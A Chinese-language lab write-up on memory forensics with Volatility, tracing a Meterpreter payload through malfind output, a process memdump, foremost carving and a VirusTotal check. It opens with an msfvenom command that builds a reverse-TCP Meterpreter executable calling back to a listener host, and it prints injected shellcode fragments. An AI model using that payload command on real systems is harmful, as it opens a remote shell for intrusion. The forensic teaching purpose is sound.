记录下Volatility使用过程

环境

  • Parrot *1
  • Windows 2008*1

先生成个msf马子

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.17.6 LPORT=4444 -a x64 -f exe -o /home/parrot/Desktop/1.exe

拷到Windows2008机器上运行后迁移进程

image-20201026142436055

image-20201026142448911

然后使用dumpit对内存做完整镜像

image-20201026142524994

做好后的镜像大小取决于机器内存的大小,机器内存越大,镜像后的文件越大

image-20201026142619139

拷回parrot,开始分析

分析

命令如下

volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind查找疑似被注入的进程,这里应该先执行volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw imageinfo来确定使用配置文件的

┌─[root@parrot]─[/home/parrot/Desktop]
└──╼ #volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind
Volatility Foundation Volatility Framework 2.6
Process: wvs_supervisor Pid: 1088 Address: 0x2e0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x002e0000  00 00 00 00 59 e9 ce cd 13 00 e8 f5 ff ff ff 00   ....Y...........
0x002e0010  00 00 00 00 00 00 00 e8 e8 ff ff ff 0a 00 2e 00   ................
0x002e0020  00 00 00 00 e8 db ff ff ff 17 00 2e 00 00 00 00   ................
0x002e0030  00 e8 ce ff ff ff 24 00 2e 00 00 00 00 00 e8 c1   ......$.........

0x002e0000 0000             ADD [EAX], AL
0x002e0002 0000             ADD [EAX], AL
0x002e0004 59               POP ECX
0x002e0005 e9cecd1300       JMP 0x41cdd8
0x002e000a e8f5ffffff       CALL 0x2e0004
0x002e000f 0000             ADD [EAX], AL
0x002e0011 0000             ADD [EAX], AL
0x002e0013 0000             ADD [EAX], AL
0x002e0015 0000             ADD [EAX], AL
0x002e0017 e8e8ffffff       CALL 0x2e0004
0x002e001c 0a00             OR AL, [EAX]
0x002e001e 2e0000           ADD [CS:EAX], AL
0x002e0021 0000             ADD [EAX], AL
0x002e0023 00e8             ADD AL, CH
0x002e0025 db               DB 0xdb
0x002e0026 ff               DB 0xff
0x002e0027 ff               DB 0xff
0x002e0028 ff17             CALL DWORD [EDI]
0x002e002a 002e             ADD [ESI], CH
0x002e002c 0000             ADD [EAX], AL
0x002e002e 0000             ADD [EAX], AL
0x002e0030 00e8             ADD AL, CH
0x002e0032 ce               INTO
0x002e0033 ff               DB 0xff
0x002e0034 ff               DB 0xff
0x002e0035 ff2400           JMP DWORD [EAX+EAX]
0x002e0038 2e0000           ADD [CS:EAX], AL
0x002e003b 0000             ADD [EAX], AL
0x002e003d 00e8             ADD AL, CH
0x002e003f c1               DB 0xc1

Process: opsrv.exe Pid: 1140 Address: 0x670000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x00670000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00670010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00670020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00670030  00 00 00 00 00 00 00 00 00 00 67 00 00 00 00 00   ..........g.....

0x00670000 0000             ADD [EAX], AL
0x00670002 0000             ADD [EAX], AL
0x00670004 0000             ADD [EAX], AL
0x00670006 0000             ADD [EAX], AL
0x00670008 0000             ADD [EAX], AL
0x0067000a 0000             ADD [EAX], AL
0x0067000c 0000             ADD [EAX], AL
0x0067000e 0000             ADD [EAX], AL
0x00670010 0000             ADD [EAX], AL
0x00670012 0000             ADD [EAX], AL
0x00670014 0000             ADD [EAX], AL
0x00670016 0000             ADD [EAX], AL
0x00670018 0000             ADD [EAX], AL
0x0067001a 0000             ADD [EAX], AL
0x0067001c 0000             ADD [EAX], AL
0x0067001e 0000             ADD [EAX], AL
0x00670020 0000             ADD [EAX], AL
0x00670022 0000             ADD [EAX], AL
0x00670024 0000             ADD [EAX], AL
0x00670026 0000             ADD [EAX], AL
0x00670028 0000             ADD [EAX], AL
0x0067002a 0000             ADD [EAX], AL
0x0067002c 0000             ADD [EAX], AL
0x0067002e 0000             ADD [EAX], AL
0x00670030 0000             ADD [EAX], AL
0x00670032 0000             ADD [EAX], AL
0x00670034 0000             ADD [EAX], AL
0x00670036 0000             ADD [EAX], AL
0x00670038 0000             ADD [EAX], AL
0x0067003a 670000           ADD [BX+SI], AL
0x0067003d 0000             ADD [EAX], AL
0x0067003f 00               DB 0x0

Process: explorer.exe Pid: 2616 Address: 0x25d0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 50, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x025d0000  fc 48 89 ce 48 81 ec 00 20 00 00 48 83 e4 f0 e8   .H..H......H....
0x025d0010  cc 00 00 00 41 51 41 50 52 48 31 d2 65 48 8b 52   ....AQAPRH1.eH.R
0x025d0020  60 48 8b 52 18 48 8b 52 20 51 56 48 0f b7 4a 4a   `H.R.H.R.QVH..JJ
0x025d0030  48 8b 72 50 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c   H.rPM1.H1..<a|.,

0x025d0000 fc               CLD
0x025d0001 48               DEC EAX
0x025d0002 89ce             MOV ESI, ECX
0x025d0004 48               DEC EAX
0x025d0005 81ec00200000     SUB ESP, 0x2000
0x025d000b 48               DEC EAX
0x025d000c 83e4f0           AND ESP, -0x10
0x025d000f e8cc000000       CALL 0x25d00e0
0x025d0014 41               INC ECX
0x025d0015 51               PUSH ECX
0x025d0016 41               INC ECX
0x025d0017 50               PUSH EAX
0x025d0018 52               PUSH EDX
0x025d0019 48               DEC EAX
0x025d001a 31d2             XOR EDX, EDX
0x025d001c 6548             DEC EAX
0x025d001e 8b5260           MOV EDX, [EDX+0x60]
0x025d0021 48               DEC EAX
0x025d0022 8b5218           MOV EDX, [EDX+0x18]
0x025d0025 48               DEC EAX
0x025d0026 8b5220           MOV EDX, [EDX+0x20]
0x025d0029 51               PUSH ECX
0x025d002a 56               PUSH ESI
0x025d002b 48               DEC EAX
0x025d002c 0fb74a4a         MOVZX ECX, WORD [EDX+0x4a]
0x025d0030 48               DEC EAX
0x025d0031 8b7250           MOV ESI, [EDX+0x50]
0x025d0034 4d               DEC EBP
0x025d0035 31c9             XOR ECX, ECX
0x025d0037 48               DEC EAX
0x025d0038 31c0             XOR EAX, EAX
0x025d003a ac               LODSB
0x025d003b 3c61             CMP AL, 0x61
0x025d003d 7c02             JL 0x25d0041
0x025d003f 2c               DB 0x2c

Process: explorer.exe Pid: 2616 Address: 0x2610000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 38, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x02610000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   MZ..............
0x02610010  b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00   ........@.......
0x02610020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x02610030  00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00   ................

0x02610000 4d               DEC EBP
0x02610001 5a               POP EDX
0x02610002 90               NOP
0x02610003 0003             ADD [EBX], AL
0x02610005 0000             ADD [EAX], AL
0x02610007 000400           ADD [EAX+EAX], AL
0x0261000a 0000             ADD [EAX], AL
0x0261000c ff               DB 0xff
0x0261000d ff00             INC DWORD [EAX]
0x0261000f 00b800000000     ADD [EAX+0x0], BH
0x02610015 0000             ADD [EAX], AL
0x02610017 004000           ADD [EAX+0x0], AL
0x0261001a 0000             ADD [EAX], AL
0x0261001c 0000             ADD [EAX], AL
0x0261001e 0000             ADD [EAX], AL
0x02610020 0000             ADD [EAX], AL
0x02610022 0000             ADD [EAX], AL
0x02610024 0000             ADD [EAX], AL
0x02610026 0000             ADD [EAX], AL
0x02610028 0000             ADD [EAX], AL
0x0261002a 0000             ADD [EAX], AL
0x0261002c 0000             ADD [EAX], AL
0x0261002e 0000             ADD [EAX], AL
0x02610030 0000             ADD [EAX], AL
0x02610032 0000             ADD [EAX], AL
0x02610034 0000             ADD [EAX], AL
0x02610036 0000             ADD [EAX], AL
0x02610038 0000             ADD [EAX], AL
0x0261003a 0000             ADD [EAX], AL
0x0261003c f00000           LOCK ADD [EAX], AL
0x0261003f 00               DB 0x0

Process: explorer.exe Pid: 2616 Address: 0x2920000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 57, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x02920000  4d 5a 41 52 55 48 89 e5 48 83 ec 20 48 83 e4 f0   MZARUH..H...H...
0x02920010  e8 00 00 00 00 5b 48 81 c3 23 5b 00 00 ff d3 48   .....[H..#[....H
0x02920020  81 c3 c8 ae 02 00 48 89 3b 49 89 d8 6a 04 5a ff   ......H.;I..j.Z.
0x02920030  d0 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00   ................

0x02920000 4d               DEC EBP
0x02920001 5a               POP EDX
0x02920002 41               INC ECX
0x02920003 52               PUSH EDX
0x02920004 55               PUSH EBP
0x02920005 48               DEC EAX
0x02920006 89e5             MOV EBP, ESP
0x02920008 48               DEC EAX
0x02920009 83ec20           SUB ESP, 0x20
0x0292000c 48               DEC EAX
0x0292000d 83e4f0           AND ESP, -0x10
0x02920010 e800000000       CALL 0x2920015
0x02920015 5b               POP EBX
0x02920016 48               DEC EAX
0x02920017 81c3235b0000     ADD EBX, 0x5b23
0x0292001d ffd3             CALL EBX
0x0292001f 48               DEC EAX
0x02920020 81c3c8ae0200     ADD EBX, 0x2aec8
0x02920026 48               DEC EAX
0x02920027 893b             MOV [EBX], EDI
0x02920029 49               DEC ECX
0x0292002a 89d8             MOV EAX, EBX
0x0292002c 6a04             PUSH 0x4
0x0292002e 5a               POP EDX
0x0292002f ffd0             CALL EAX
0x02920031 0000             ADD [EAX], AL
0x02920033 0000             ADD [EAX], AL
0x02920035 0000             ADD [EAX], AL
0x02920037 0000             ADD [EAX], AL
0x02920039 0000             ADD [EAX], AL
0x0292003b 00f0             ADD AL, DH
0x0292003d 0000             ADD [EAX], AL
0x0292003f 00               DB 0x0

Process: explorer.exe Pid: 2616 Address: 0x3e10000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x03e10000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x03e10010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x03e10020  00 00 e1 03 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x03e10030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

0x03e10000 0000             ADD [EAX], AL
0x03e10002 0000             ADD [EAX], AL
0x03e10004 0000             ADD [EAX], AL
0x03e10006 0000             ADD [EAX], AL
0x03e10008 0000             ADD [EAX], AL
0x03e1000a 0000             ADD [EAX], AL
0x03e1000c 0000             ADD [EAX], AL
0x03e1000e 0000             ADD [EAX], AL
0x03e10010 0000             ADD [EAX], AL
0x03e10012 0000             ADD [EAX], AL
0x03e10014 0000             ADD [EAX], AL
0x03e10016 0000             ADD [EAX], AL
0x03e10018 0000             ADD [EAX], AL
0x03e1001a 0000             ADD [EAX], AL
0x03e1001c 0000             ADD [EAX], AL
0x03e1001e 0000             ADD [EAX], AL
0x03e10020 0000             ADD [EAX], AL
0x03e10022 e103             LOOPZ 0x3e10027
0x03e10024 0000             ADD [EAX], AL
0x03e10026 0000             ADD [EAX], AL
0x03e10028 0000             ADD [EAX], AL
0x03e1002a 0000             ADD [EAX], AL
0x03e1002c 0000             ADD [EAX], AL
0x03e1002e 0000             ADD [EAX], AL
0x03e10030 0000             ADD [EAX], AL
0x03e10032 0000             ADD [EAX], AL
0x03e10034 0000             ADD [EAX], AL
0x03e10036 0000             ADD [EAX], AL
0x03e10038 0000             ADD [EAX], AL
0x03e1003a 0000             ADD [EAX], AL
0x03e1003c 0000             ADD [EAX], AL
0x03e1003e 0000             ADD [EAX], AL

Process: explorer.exe Pid: 2616 Address: 0x3e90000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 16, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x03e90000  41 ba 80 00 00 00 48 b8 38 a1 d6 fd fe 07 00 00   A.....H.8.......
0x03e90010  48 ff 20 90 41 ba 81 00 00 00 48 b8 38 a1 d6 fd   H...A.....H.8...
0x03e90020  fe 07 00 00 48 ff 20 90 41 ba 82 00 00 00 48 b8   ....H...A.....H.
0x03e90030  38 a1 d6 fd fe 07 00 00 48 ff 20 90 41 ba 83 00   8.......H...A...

0x03e90000 41               INC ECX
0x03e90001 ba80000000       MOV EDX, 0x80
0x03e90006 48               DEC EAX
0x03e90007 b838a1d6fd       MOV EAX, 0xfdd6a138
0x03e9000c fe07             INC BYTE [EDI]
0x03e9000e 0000             ADD [EAX], AL
0x03e90010 48               DEC EAX
0x03e90011 ff20             JMP DWORD [EAX]
0x03e90013 90               NOP
0x03e90014 41               INC ECX
0x03e90015 ba81000000       MOV EDX, 0x81
0x03e9001a 48               DEC EAX
0x03e9001b b838a1d6fd       MOV EAX, 0xfdd6a138
0x03e90020 fe07             INC BYTE [EDI]
0x03e90022 0000             ADD [EAX], AL
0x03e90024 48               DEC EAX
0x03e90025 ff20             JMP DWORD [EAX]
0x03e90027 90               NOP
0x03e90028 41               INC ECX
0x03e90029 ba82000000       MOV EDX, 0x82
0x03e9002e 48               DEC EAX
0x03e9002f b838a1d6fd       MOV EAX, 0xfdd6a138
0x03e90034 fe07             INC BYTE [EDI]
0x03e90036 0000             ADD [EAX], AL
0x03e90038 48               DEC EAX
0x03e90039 ff20             JMP DWORD [EAX]
0x03e9003b 90               NOP
0x03e9003c 41               INC ECX
0x03e9003d ba               DB 0xba
0x03e9003e 83               DB 0x83
0x03e9003f 00               DB 0x0

Process: explorer.exe Pid: 2616 Address: 0x4360000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 106, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x04360000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   MZ..............
0x04360010  b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00   ........@.......
0x04360020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x04360030  00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00   ................

0x04360000 4d               DEC EBP
0x04360001 5a               POP EDX
0x04360002 90               NOP
0x04360003 0003             ADD [EBX], AL
0x04360005 0000             ADD [EAX], AL
0x04360007 000400           ADD [EAX+EAX], AL
0x0436000a 0000             ADD [EAX], AL
0x0436000c ff               DB 0xff
0x0436000d ff00             INC DWORD [EAX]
0x0436000f 00b800000000     ADD [EAX+0x0], BH
0x04360015 0000             ADD [EAX], AL
0x04360017 004000           ADD [EAX+0x0], AL
0x0436001a 0000             ADD [EAX], AL
0x0436001c 0000             ADD [EAX], AL
0x0436001e 0000             ADD [EAX], AL
0x04360020 0000             ADD [EAX], AL
0x04360022 0000             ADD [EAX], AL
0x04360024 0000             ADD [EAX], AL
0x04360026 0000             ADD [EAX], AL
0x04360028 0000             ADD [EAX], AL
0x0436002a 0000             ADD [EAX], AL
0x0436002c 0000             ADD [EAX], AL
0x0436002e 0000             ADD [EAX], AL
0x04360030 0000             ADD [EAX], AL
0x04360032 0000             ADD [EAX], AL
0x04360034 0000             ADD [EAX], AL
0x04360036 0000             ADD [EAX], AL
0x04360038 0000             ADD [EAX], AL
0x0436003a 0000             ADD [EAX], AL
0x0436003c 0001             ADD [ECX], AL
0x0436003e 0000             ADD [EAX], AL

可以看到2616进程检出了MZ头,dump下

┌─[root@parrot]─[/home/parrot/Desktop]
└──╼ #volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 memdump -p 2616 -D /home/parrot/Desktop/dump/
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing explorer.exe [  2616] to 2616.dmp

这时候把dmp文件传到VT通常是杀不出来的,毕竟文件体积在那

image-20201026143108818

foremost提取下再看看

┌─[parrot@parrot]─[~/Desktop/dump]
└──╼ $foremost -i 2616.dmp
Processing: 2616.dmp
|*****|

image-20201026143155763

已经按照文件类型自动分了类,直接看DLL文件夹

image-20201026143348020

传VT

meterpreter已检出